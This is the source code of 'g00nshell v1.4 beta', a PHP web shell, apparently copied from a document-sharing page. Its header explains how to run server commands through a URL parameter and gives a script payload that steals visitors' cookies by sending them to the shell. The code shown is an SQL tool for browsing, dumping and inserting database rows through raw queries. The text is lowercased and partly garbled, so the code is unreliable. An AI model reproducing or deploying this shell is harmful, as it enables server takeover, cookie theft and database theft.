Beruflich Dokumente
Kultur Dokumente
php
/*
######################################################################
# [g00n]fish presents: #
# g00nshell v1.4 beta #
############################documentation#############################
#to execute commands, simply include ?cmd=___ in the url. #
#ex: http://site.com/shl.php?cmd=whoami #
# #
#to steal cookies, use ?cookie=___ in the url. #
#ex: <script>document.location.href= #
#'http://site.com/shl.php?cookie='+document.cookies</script> #
# #
#in the ajax command shell, type 'home' to return to the shell's #
#directory. type 'clear' to clear the output screen. #
##########################verification levels#########################
#0: no protection; anyone can access #
#1: user-agent required #
#2: require ip #
#3: basic authentication #
##############################known bugs##############################
#the sql tool is not complete. there is currently no editing function#
#available. some time in the future this may be fixed, but for now #
#don't complain to me about it #
################################shouts################################
#pr0be - beta testing & css #
#trintitty - beta testing #
#clorox - beta testing #
#everyone else at g00ns.net #
########################note to administrators########################
#if this script has been found on your server without your approval, #
#it would probably be wise to delete it and check your logs. #
######################################################################
*/
// configuration
$auth = 0;
$uakey = "b5c3d0b28619de70bf5588505f4061f2"; // md5 encoded user-agent
$ip = array("127.0.0.2","127.0.0.1"); // ip addresses allowed to access shell
$email = ""; // e-mail address where cookies will be sent
$user = "af1035a85447f5aa9d21570d884b723a"; // md5 encoded user
$pass = "47e331d2b8d07465515c50cb0fad1e5a"; // md5 encoded password
// global variables
$version = '1.4 beta';
$self = $_server['php_self'];
$soft = $_server['server_software'];
$servinf = split('[:]', $_server['http_host']);
$servip = $servinf[0];
$servport = @$servinf[1] ? $servinf[1] : '80';
$cmd = @$_get['cmd'];
$act = @$_get['act'];
$cmd = @$_get['cmd'];
$curdir = cleandir(getcwd());
if(@$_get['dir']){
$dir = $_get['dir'];
if($dir != 'nullz') $dir = cleandir($dir);
}
$contents = @$_post['contents'];
$gf = @$_post['gf'];
$img = @$_get['img'];
// credits to disruptiv for this bit ;)
if(count(get_included_files()) > 1 || count(get_included_files()) > 1) list($me) =
explode("&", $_server['request_uri']);
else $me = $php_self . "?";
@session_start();
@set_time_limit(5);
switch($auth){ // authentication switcher
case 1: if(md5($_server['http_user_agent']) != $uakey) hide(); break;
case 2: if(!in_array($_server['remote_addr'],$ip)) hide(); break;
case 3: if(!$_server['php_auth_user']) userauth(); break;
default: break;
}
if(!$act && !$cmd && !@$_get['cookie'] && !@$_get['f'] && !@$dir && !$gf && !$img
&& !@$_get['ajxcmd']) main();
if (@$_get['db']){
mysql_select_db($_get['db'], $sqlcon);
if(@$_get['sqlquery']){
$dat = mysql_query($_get['sqlquery'], $sqlcon) or die(mysql_error());
$num = mysql_num_rows($dat);
for($i=0;$i<$num;$i++)
echo(mysql_result($dat, $i) . "<br>\n");
}
else if(@$_get['table'] && !@$_get['sqlf']){
echo("<a href='" . $me . "&act=sql&db=" . $_get['db'] . "&table=" .
$_get['table'] . "&sqlf=ins" . "'>insert row</a><br><br>\n");
echo("<table border='1'>");
$query = "show columns from " . $_get['table'];
$result = mysql_query($query, $sqlcon) or die(mysql_error());
$i = 0;
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['field']);
echo("<th>" . $fields[$i]);
$i++;
}
$result = mysql_query("select * from " . $_get['table'], $sqlcon) or
die(mysql_error());
$num_rows = mysql_num_rows($result) or die(mysql_error());
$y=0;
for($x=1;$x<=$num_rows+1;$x++){
if(!@$_get['p'])
$_get['p'] = 1;
if(@$_get['p']){
if($y > (30*($_get['p']-1)) && $y <= 30*($_get['p'])){
echo("<tr>");
for($i=0;$i<count($fields);$i++){
$query = "select " . $fields[$i] . " from " .
$_get['table'] . " where " . $fields[0] . " = '" . $x . "'";
$dat = mysql_query($query, $sqlcon) or
die(mysql_error());
while($row = mysql_fetch_row($dat))
echo("<td>" . $row[0] . "</td>");
}
echo("</tr>\n");
}
}
$y++;
}
echo("</table>\n");
for($z=1;$z<=ceil($num_rows / 30);$z++){
echo("<a href='" . $me . "act=sql&db=" . $_get['db'] . "&table=" .
$_get['table'] . "&p=" . $z . "'>" . $z . "</a> | ");
}
}
elseif(@$_get['table'] && @$_get['sqlf']){
switch($_get['sqlf']){
case "dl": sqldownload();break;
case "ins": sqlinsert();break;
default: $_get['sqlf'] = "";
}
}
else{
echo("<table>");
$query = "show tables from " . $_get['db'];
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while ($row = mysql_fetch_row($dat))
echo("<tr><td><a href='" . $me . "&act=sql&db=" . $_get['db'] .
"&table=" . $row[0] . "'>" . $row[0] . "</a></td><td>[<a href='" . $me .
"&act=sql&db=" . $_get['db'] . "&table=" . $row[0] ."&sqlf=dl" .
"'>download</a>]</td></tr>\n");
echo("</table>");
}
}
else{
$dbs=mysql_list_dbs($sqlcon);
while($row = mysql_fetch_object($dbs))
echo("<a href='" . $me . "&act=sql&db=" . $row->database . "'>" .
$row->database . "</a><br>\n");
}
mysql_close($sqlcon);
}
function sqlinsert(){
style();
$sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_port'],
$_session['sql_user'], $_session['sql_password']);
mysql_select_db($_get['db'], $sqlcon);
if(@$_post['ins']){
unset($_post['ins']);
$fields = array_flip($_post);
print_r($_post);
$f = implode(",", $fields);
$v = implode("','", $_post);
$query = "insert into " . $_get['table'] . " (" . $f . ") values ('" . $v
. "')";
echo($query);
mysql_query($query, $sqlcon) or die("mysql error: " . mysql_error());
die("row inserted.<br>\n<a href='" . $me . "&act=sql&db=" . $_get['db'] .
"&table=" . $_get['table'] . "'>go back</a>");
}
$query = "show columns from " . @$_get['table'];
$result = mysql_query($query, $sqlcon) or die("mysql error: " .
mysql_error());
$i = 0;
$fields = array();
echo("<form method='post'>");
echo("<table>");
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['field']);
echo("<tr><td><b>" . $fields[$i] . "</b><td><input type='text' name='" .
$fields[$i] . "'><br>\n");
$i++;
}
echo("</table>");
echo("<br>\n<input type='submit' value='insert' name='ins'>");
echo("</form>");
}
function nicesize($size){
if(!$size) return "0 b";
if ($size >= 1073741824) return(round($size / 1073741824) . " gb");
elseif ($size >= 1048576) return(round($size / 1048576) . " mb");
elseif ($size >= 1024) return(round($size / 1024) . " kb");
else return($size . " b");
}